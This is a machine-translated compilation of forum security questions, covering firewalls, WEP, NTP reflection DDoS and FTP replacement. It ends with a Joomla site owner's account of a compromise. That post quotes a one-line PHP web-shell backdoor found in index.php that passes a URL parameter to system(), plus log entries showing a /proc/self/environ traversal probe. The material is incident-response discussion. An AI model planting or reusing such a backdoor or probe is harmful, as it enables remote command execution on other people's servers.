那里有防火墙可以分析stream量,如果不需要的话可以阻止stream量。 这些防火墙对于encryptionstream量的效果如何?例如HTTPS或SSL上的IMAP? 一个例子:防火墙可以区分端口443上的HTTPSstream量,可以说,保护443以上的远程桌面stream量?
学习一个我有联系的公司,我发现他们的服务器上没有安装encryption或防病毒软件。 当他们问他们的IT公司为什么(他们处理大量敏感数据)时,他们被告知这两者都会影响性能,所以他们决定放弃它。 我很担心这个,因为这听起来像是一个重大的安全问题,但是我希望这里有人能澄清。 我不是系统pipe理员,但是这不适合我。
我可以使用nmap来执行端口扫描,以testing给定的IP是否被使用,例如 nmap -PR 192.168.1.9 然而,大多数服务器没有安装nmap,是否有可能没有安装nmap有相同的结果(例如检查是否使用特定的IP)?
保护networking可能是一项非常困难的任务。 有很多硬件和软件明智(用户旁边!) 你采取了哪些步骤来validation你的networking是安全的? 你使用什么工具来保护你的networking? 什么是一些定期不固定的大漏洞?
我使用一个Netgear无线路由器,连接到各种无线设备。 我的一个无线设备不支持WPA2安全,所以我不得不将路由器的安全性降级到WEP。 我们都知道WEP是坏的,所以作为一项额外的措施,我在路由器上启用了一个无线访问列表,以便只有指定MAC地址在我的访问列表中的设备才被允许连接到路由器。 我知道,为了访问像这样的安全networking,可以伪装设备的MAC地址。 但是容易吗? 是否使用WEP和无线访问列表来防止大多数黑客攻击? 还是应该尽我所能确保所有设备将来都支持WPA2?
反正有保护根密码。 人们知道通过单用户模式来更改root密码。 如何保护没有人可以通过单用户模式更改我的机器的密码。
我听说过ntp用于reflection的新型DDOS。 我的问题很简单: 你能否详细说明他们如何工作和澄清? 由于ntp是通过UDP运行的,我想假设在某个地方必须有某种伪造的数据包? 如何彻底检查一些ntp服务器是否容易受到攻击(不能参与攻击)? 如果我们成为这种攻击的目标,有什么办法可以缓解? 由于这种攻击在2014年被广泛使用,下面是一些细节: 你可以在这个cve上find更多的信息。 “昨天傍晚01/30/2014,从CET开始的22:15,巴黎的Witbenetworking受到了使用NTP放大的分布式拒绝服务(DDOS)攻击的严重影响。 Ouch,350Gpbs,伤害http://www.itnews.com.au/News/372033,worlds-largest-ddos-strikes-us-europe.aspx 有关ddos的通用行为可以在这里find: 我在DDoS下。 我能做什么? Bbc谈到ntp攻击: http : //www.bbc.com/news/technology-26662051 还有一个问题:如果我logging正确,默认情况下在127.0.0.1上监听openntpd,在0.0.0.0上监听ntpd – 我不太确定参与reflectionddos的所有ntp服务器是否需要公开地提供服务 – 仅仅是我想不熟练的系统pipe理员安装ntp本地同步时间和保留默认的configuration文件。 预防和减轻这种问题的一个简单方法是默认监听127.0.0.1? 我想这是真的任何服务(bind9,mysql,…)?
我想用更安全的系统取代FTP访问。 以纯文本方式发送不encryption的密码是不可接受的,单点login日益增长,日益变得不太可接受。 问题:我需要一些支持Linux,Windows和OS X的服务器,并且服务器需要在Windows上运行。 编辑:它还需要根据预先存在的Windows凭据对用户进行身份validation。
只是好奇:人们如何“locking”他们的networking,以防止未经授权的设备获得networking访问? 在DHCP与静态IPnetworking中是不同的吗? Windows AD如何pipe理? 编辑:我没有试图阻止任何事情本身。 只是好奇一个“安全”的networking应该如何实施
我运行的Joomla网站前几天被黑了。 黑客把一些文件放到了tmp目录下,并在那里运行了一个HTTP守护进程(至less这是我的主机告诉我的)。 无论如何,我一直在努力清理他们留下的文件,并确保我能做到,但在检查我的日志时,我注意到了www.domain.com/?cmd=ls上的一个命中。 这对我来说似乎很奇怪,所以我试了一下……并且注意到它列出了我站点根目录下的所有文件。 有人可以向我解释为什么发生这种情况,我怎么阻止它? 这似乎是一个巨大的利用,我想立即消除。 更新 :在挖掘我注意到一些额外的行添加到我的Joomla index.php: if ($_GET['cmd']!=null) { system($_GET['cmd']); } 我已经删除了这些内容,但是很想知道攻击者是如何设法编辑这些内容的。 不确定在哪里看,以确保我closures了任何后门。 更新更新 :首先让我说,是的,我意识到在这里采取正确的行动是把网站吹走并从备份恢复。 不过,我宁愿把它作为最后的手段,因为(一)这是一个网站,取决于社区的贡献,我的备份不是最近(我的错,我知道)和(二)我正在一个新的版本,应该很快就绪。 但是因为我似乎在这里得到了一些帮助,所以我会添加一些我发现/为了解决这种情况而做的其他事情。 在我的/ tmp文件夹中发现了一些.kin(或者类似的东西 – 没有记下来并且马上删除它)目录,显然这个http守护进程从哪里运行。 我假设gunzip(下面提到)是这样放在这里的。 在我的error_log文件中,我发现以下可疑条目(“…”是我尝试从这个post中删除path/文件名): [04-Jul-2010 09:45:58] PHP Fatal error: Class 'CkformsController../../../../../../../../../../../../../../../proc/self/environ' not found in … on line 24 [05-Jul-2010 12:31:30] PHP Notice: Undefined index: HTTP_USER_AGENT in … on line 92 [04-Jul-2010 06:41:52] PHP […]